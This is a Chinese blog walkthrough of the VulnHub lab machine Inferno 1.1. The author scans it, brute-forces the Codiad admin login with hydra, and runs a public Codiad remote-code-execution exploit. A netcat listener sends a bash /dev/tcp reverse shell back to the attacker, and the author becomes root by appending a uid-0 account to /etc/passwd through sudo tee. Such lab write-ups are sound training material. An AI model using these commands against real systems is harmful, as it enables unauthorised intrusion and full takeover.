vulnhub:inferno-1.1

最新推荐文章于 2023-10-10 16:53:25 发布
最新推荐文章于 2023-10-10 16:53:25 发布
阅读量1.5k 收藏 7
点赞数 3
分类专栏: vulnhub靶场 文章标签: 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50688050/article/details/119902735
版权

目录

信息搜集

扫描网段确定真实IP地址

 扫描IP地址确定开放端口以及服务

 浏览器查看web站点

扫描网站目录

 发现站点入口

发现漏洞

 暴力破解登录页面

登录后台

getshell

 搜索管理平台名找到利用脚本

 最终确定49705.py为exp       

 提权

发现隐藏文件

​hex解密隐藏文件得到一组用户密码

ssh登录该用户并得到第一个flag

提升至root权限

 查询该提权命令的利用方法

首先将要设置的密码转换为sha-512

写入root权限用户

登录root权限用户得到flag

 

总结

参考资料

​​​​​​​

信息搜集

扫描网段确定真实IP地址

 扫描IP地址确定开放端口以及服务

nmap -A  -p- 192.168.179.168

说实话我还是第一次扫出来这么多端口,但是仔细看看好像哪里又有点不太对劲,好像大多数服务后面都跟了?号,感觉应该是误报,毕竟web和ssh是确定的

 浏览器查看web站点

 

 是什么不重要,重要的是什么都没有

扫描网站目录

顺便说一句我也不是一开始就顺利扫到这个目录,我比较习惯用dirsearch和dirb这两款扫描工具,但是很无奈这俩大哥都不好使了(一般我都是默认扫,所以加载的字典可能不够大),没办法尝试了一下gobuster还真扫出来了

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt   -x html -u http://192.168.179.168

 发现站点入口

发现漏洞

 暴力破解登录页面

也没有更好的办法了,只能尝试一下爆破。

hydra -L ~/Desktop/Fuzzing-Dicts-master/Webmanage-Username.txt -P /usr/share/wordlists/rockyou.txt 192.168.179.168  -f http-get /inferno/ -t 64
####
-L:指定用户名字典
-P:指定密码字典
-f:找到第一对登录名或者密码的时候中止破解
-t:指定线程数
http—get:请求方式
得到
    用户名:admin
     密码: dante1

登录后台

 输入相同的账号密码,进入后台管理页面

 我是几乎把这些文件都看得差不多了,也没看出什么名堂,但是右键发现可以上传文件

getshell

一开始以为可以上传反弹shell文件getshell,后来发现文件是上传了,但是却找不到去哪了,只能换个思路。这是个后台管理平台,那平台本身就可能存在漏洞。

 搜索管理平台名找到利用脚本

searchsploit  codiad

本来还打算搞到版本号,搞得精确一点,奈何所有文件都翻过来也没翻到版本信息,好像是翻到了但是加密了。后来一想直接搜算了,好在搜出来的利用脚本并不多大不了挨个试嘛

 最终确定49705.py为exp       

locate multiple/webapps/49705.py
scp /usr/share/exploitdb/exploits/multiple/webapps/49705.py /tmp
cd /tmp
python 49705.py http://admin:dante1@192.168.179.168/inferno/ admin dante1 192.168.179.145 4444 linux

但是很奇怪,我也不知道为什么我利用这个脚本的时候一直利用不成功。后来Google到了另一个利用脚本,按理说他俩应该是一样的。但是这个就可以成功利用

git clone https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit.git
cd Codiad-Remote-Code-Execute-Exploit
chmod +x exploit.py
./exploit.py http://admin:dante1@192.168.179.168/inferno/ admin dante1 192.168.179.145 4444 linux
另起一个终端
echo 'bash -c "bash -i >/dev/tcp/192.168.179.145/4445 0>&1 2>&1"' | nc -lnvp 4444
再来一个
nc -lnvp 4445
回到最初的那个
Y

 

 

 

 提权

发现隐藏文件

cd /home
ls -al
cd dante
ls -al
cd Downloads
ls -al
cat .download.dat

hex解密隐藏文件得到一组用户密码

c2 ab 4f 72 20 73 65 e2 80 99 20 74 75 20 71 75 65 6c 20 56 69 72 67 69 6c 69 6f 20 65 20 71 75 65 6c 6c 61 20 66 6f 6e 74 65 0a 63 68 65 20 73 70 61 6e 64 69 20 64 69 20 70 61 72 6c 61 72 20 73 c3 ac 20 6c 61 72 67 6f 20 66 69 75 6d 65 3f c2 bb 2c 0a 72 69 73 70 75 6f 73 e2 80 99 69 6f 20 6c 75 69 20 63 6f 6e 20 76 65 72 67 6f 67 6e 6f 73 61 20 66 72 6f 6e 74 65 2e 0a 0a c2 ab 4f 20 64 65 20 6c 69 20 61 6c 74 72 69 20 70 6f 65 74 69 20 6f 6e 6f 72 65 20 65 20 6c 75 6d 65 2c 0a 76 61 67 6c 69 61 6d 69 20 e2 80 99 6c 20 6c 75 6e 67 6f 20 73 74 75 64 69 6f 20 65 20 e2 80 99 6c 20 67 72 61 6e 64 65 20 61 6d 6f 72 65 0a 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 63 65 72 63 61 72 20 6c 6f 20 74 75 6f 20 76 6f 6c 75 6d 65 2e 0a 0a 54 75 20 73 65 e2 80 99 20 6c 6f 20 6d 69 6f 20 6d 61 65 73 74 72 6f 20 65 20 e2 80 99 6c 20 6d 69 6f 20 61 75 74 6f 72 65 2c 0a 74 75 20 73 65 e2 80 99 20 73 6f 6c 6f 20 63 6f 6c 75 69 20 64 61 20 63 75 e2 80 99 20 69 6f 20 74 6f 6c 73 69 0a 6c 6f 20 62 65 6c 6c 6f 20 73 74 69 6c 6f 20 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 6f 6e 6f 72 65 2e 0a 0a 56 65 64 69 20 6c 61 20 62 65 73 74 69 61 20 70 65 72 20 63 75 e2 80 99 20 69 6f 20 6d 69 20 76 6f 6c 73 69 3b 0a 61 69 75 74 61 6d 69 20 64 61 20 6c 65 69 2c 20 66 61 6d 6f 73 6f 20 73 61 67 67 69 6f 2c 0a 63 68 e2 80 99 65 6c 6c 61 20 6d 69 20 66 61 20 74 72 65 6d 61 72 20 6c 65 20 76 65 6e 65 20 65 20 69 20 70 6f 6c 73 69 c2 bb 2e 0a 0a 64 61 6e 74 65 3a 56 31 72 67 31 6c 31 30 68 33 6c 70 6d 33

 hex解密后

«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.

«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.

Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.

Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».


dante:V1rg1l10h3lpm3

ssh登录该用户并得到第一个flag

使用ssh是因为之前使用的那个终端不稳定老是断

提升至root权限​​​​​​​

sudo -l

 查询该提权命令的利用方法

 好的这样就大概了解到该命令的利用方法和作用。我们的思路现在是这样的,既然我有写的权限,那我直接在/etc/passwd下写个root权限的用户不就行了么

首先将要设置的密码转换为sha-512

mkpasswd -m sha-512
###
这边自己设置一个密码即可

写入root权限用户

LFILE=/etc/passwd
echo 'tester:$6$RJIWu8XvJ9VKaHHg$mDImrqHVFPVDckOH9Nxd0hIxBOs6heTrcmuMKEhwnl/B/yn764GBGjWDka6AcJgOzwQiTV9LBe5/Al8E3jrJi0:0:0:root:/root:/bin/bash' |sudo tee -a "$LFILE"
cat /etc/passwd

登录root权限用户得到flag

 

su tester
当时自己设置的密码
id
cd /root
ls -al
cat proof.txt

总结

总的来说还是有收获的比如说扫描网站目录的时候可以加载一个大点的字典或者多试试几个扫描工具可能会有意想不到的结果。然后就是./exploit.py http://admin:dante1@192.168.179.168/inferno/ admin dante1 192.168.179.145 4444 linux   这个在输入目标IP地址的时候不能单纯的输入IP地址和目录还要再前面加上admin:dante1是因为该页面有一个登录界面用于验证,这样可以帮助我们绕过该登录页面从而访问到后台管理界面。(学到了)其实还有一点搞不懂的是为什么信息藏在.download.dat里面。后来想想感觉可能跟文件本身关系也不大,应该就是隐藏文件名字而已没什么特殊含义(主要是百度谷歌都没搜出个所以然来,如果知道请告诉我,非常感谢)。最后就是又学到了一种提权方法。

参考资料

https://www.youtube.com/watch?v=oYKbbfh7ukk

https://0xjin.medium.com/inferno-1-vulnhub-details-7fd426e12e68

 

鲨鱼辣椒k
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机BSides-Vancouver-2018-Workshop渗透笔记
liver100day的博客
05-15 476
渗透测试实战–BSides-Vancouver-2018-Workshop 靶机下载/安装 靶机下载地址:https://www.vulnhub.com/entry/brainpan-1,51/ 靶机IP地址:未知 kali渗透机地址:192.168.75.128 1.主机发现
Vulnhub: Inferno: 1.1靶机
qq_43884092的博客
09-03 176
爆破codiad cms后台账号密码,codiad cms远程代码执行,利用tee写入用户
VulnHub渗透测试实战靶场 - ZICO2: 1
LYJ20010728的博客
08-07 756
VulnHub渗透测试实战靶场 - ZICO2: 1环境下载ZICO2: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 ZICO2: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集 先用arp-scan扫描一下网段内目标靶机的IP地址
vulnhub 之 vedas
鲨鱼辣椒的博客
08-16 843
信息搜集 扫描网段确定真实IP地址 扫描IP地址确定开放端口以及服务 浏览器查看web网站 好像就是一个普普通通的网站,甚至都没有什么功能点,有个搜索键还是假的。所以再web方面并没有发现什么有用的信息 扫描网站目录 dirsearch -u http://192.168.179.164 几乎等同于没有收获,我一开始还去访问了/images/目录发现12345689都有就是没有7,我还以为隐藏起来了,结果并没有就是不存在,还尝试过去找图片内的信息(隐写相关)都以失败告终。 ..
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2562
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
Inferno-OS_Android:Inferno OS的Android端口。 它可以作为常规的Android(> 4.0)应用程序使用。 构建它只需要Android Studio(> 3.0)和NDK
05-15
Inferno-OS_Android 变化 inferno-os树替换Inferno-OS-bhgv 。 用: git clone --recursive https://github.com/bhgv/Inferno-OS_Android (如果您需要老的inferno-os树) 适用于Android> v4.0(api 14) 它基于...
inferno-bug
03-21
本文将探讨“inferno-bug”这一主题,分析可能出现的问题,并提供相应的解决方案。 1. **HTML渲染异常** 当Inferno尝试渲染HTML时,有时可能会出现元素属性错误或者样式不正确的情况。这可能是由于模板字符串拼接...
little-inferno-chinesization:用于Little Inferno中国化的资源
05-01
本文将深入探讨"little-inferno-chinesization"项目,这是一个专门用于"Little Inferno"中国化的工作,包含了各种资源和工具,帮助游戏爱好者完成本地化工作。 这个项目的核心在于将游戏的原始文本从英文翻译成中文...
inferno-animation:在安装和卸载时对Inferno.js组件进行动画处理
05-02
inferno-animation 7.x支持Inferno v7 inferno-animation 6.x支持Inferno v6 Inferno-animation 5.x支持Inferno v5 inferno-animation 4.x支持Inferno v4 inferno-animation 3.x支持Inferno v3 关于 用于对安装...
inferno-3e:历史发行
03-25
Inferno-3e: 历史发行概览》 Inferno-3e 是一个基于 C 语言开发的开源操作系统项目,其名称来源于但丁·阿利吉耶里的史诗《神曲》中的“地狱篇”(Inferno)。这个系统的设计目标是提供一种轻量级、高效且安全的...
vulnhub--Vikings: 1
weixin_46107179的博客
04-26 327
靶机下载地址:下载链接 主机发现 通过arp-scan -l发现主机 信息搜集 通过nmap收集ip地址信息(开放22,80端口) 进行访问80端口,发现有一个site目录,进一步访问发现主页面只有一些简单介绍,访问时,访问速度很慢,查看源代码才知道,去访问了一些谷歌等的资源,所以访问页面比较慢 然后扫描目录,发现该目录下有一个war.txt文件 访问war.txt发现这是一个路径 访问该路径,发现是通过base64加密的 下载下来并查看文件类型发现是zip类型 发现解压需要密码 用john
Vulnhub】Litterally
4ut15m's blog
01-23 849
Litterally_WriteUp@4ut15m 信息搜集 使用nmap 扫描存活主机 nmap -sP 192.168.0.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-23 20:27 CST Nmap scan report for 192.168.0.1 Host is up (0.0059s latency)....
vulnhub_Inferno靶机渗透测试
最新发布
m0_66225311的博客
10-10 199
本次靶机还挺不错,碰到了一些新的内容,也学到了一些知识前期就是常规的web渗透,扫目录信息信息收集操作。gobuster的扫描结果还是比较全的,毕竟能指定密码本和文件后缀等内容新内容就是那个登录验证的功能了,在获取权限的时候,要使用到验证后的界面,需要在url上添加http://用户名:密码@地址,因为该验证是GET传递,所以可以直接写在url上进行验证对于模块框架没有很好的攻击思路时候,可以查看一下模块框架的名称,搜索一下是否有一些历史漏洞,利用POC进行攻击提权也了解到需要对隐藏文件。
Dante‘s Inferno靶机实战
yuan_boss的博客
06-27 296
​ 通过这次的靶机,我感受到了思维扩散的重要性。首先通过目录扫描,如果知识面不够,根本发现不了其他的目录,只有一张带文字的图片,容易深陷其中,这次靶机新增了一个目录扫描工具gobuster,这个目录扫描工具相比于nikto,dirb。​ 扫描出目录之后,发现有个登录框,由于这个是网页,于是自然想到BP抓包,先随便填写数据,看看抓包情况,进行分析,一般登录框就需要进行爆破了,爆破结果取决于密码字典是否强大,由于不知道用户名,可以先尝试使用admin。
Vulnhub靶机实战-NARAK
黑白的博客
01-18 1032
声明 好好学习,天天向上 搭建 用vmware打开,都调成NAT或者都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.52 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.31.52 看了首页,看见了地狱一样,不禁让我想起了最近的电视剧《风声》里面的地狱变 扫目录吧 python3 dirsearch.py -u 192.168.31.52 开的目录不是很多 使用
靶机渗透测试(HA: NARAK)
@小张小张的博客
10-24 2916
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
扫描指定ip的指定端口,识别开放的端口所对应的服务
jexsen的博客
03-26 1447
扫描指定ip的指定端口,识别开放的端口所对应的服务 #!/usr/bin/env python # -*- coding: utf-8 -*- from optparse import OptionParser import time import socket import os import re SIGNS = ( # 协议 | 版本 | 关键字 b'FTP|FTP|^220.*FTP', b'MySQL|MySQL|mysql_native_password',
扫描网络端口
capture3333的博客
07-07 7817
编写程序扫描网络端口,查看状态--关闭或者开启,同时要设置端口关闭或者开启功能,并且能够扫描到开启或者关闭的端口。
VulnHub——DC-5(具体漏洞详解)
高野02blog
12-29 1124
DC-5 这是DC-5的描述,从中得到一些关键信息。 开始 nmap扫描 确定IP地址后端口扫描 发现80端口 使用kali自带工具dirbuster遍历目录 AWVS对网站扫描并没发现重大漏洞 发现只有以下这个界面存在交互 访问footer.php页面时发现了描述中会随着页面刷新改变的东西 我们猜测thankyou.php中incloude()包含了footer.php, 如果是动态包含的路径就可能存在LFI漏洞 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值